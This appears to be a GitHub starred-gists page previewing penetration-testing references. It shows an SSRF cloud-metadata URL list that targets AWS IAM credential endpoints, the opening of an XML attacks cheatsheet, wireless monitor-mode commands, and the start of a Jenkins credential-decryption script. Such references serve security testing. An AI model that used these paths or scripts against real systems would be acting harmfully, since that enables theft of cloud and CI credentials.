Wen Bin kongwenbin

@jhaddix
jhaddix / cloud_metadata.txt
Last active Aug 12, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@mgeeky
mgeeky / xml-attacks.md
Last active Aug 3, 2020
XML Vulnerabilities and Attacks cheatsheet
View xml-attacks.md

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker could abuse XML features to carry out denial-of-service attacks, access local files, generate network connections to other machines, or circumvent firewalls.

A penetration tester running XML tests against an application has to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.


@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created Jul 2, 2016
Wireless Penetration Testing Cheat Sheet
View Wireless Penetration Testing Cheat Sheet.md

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@tuxfight3r
tuxfight3r / jenkins-decrypt.groovy
Created Sep 23, 2015
Decrypting Jenkins Password
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
#go to the jenkins url
http://jenkins-host/script
#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'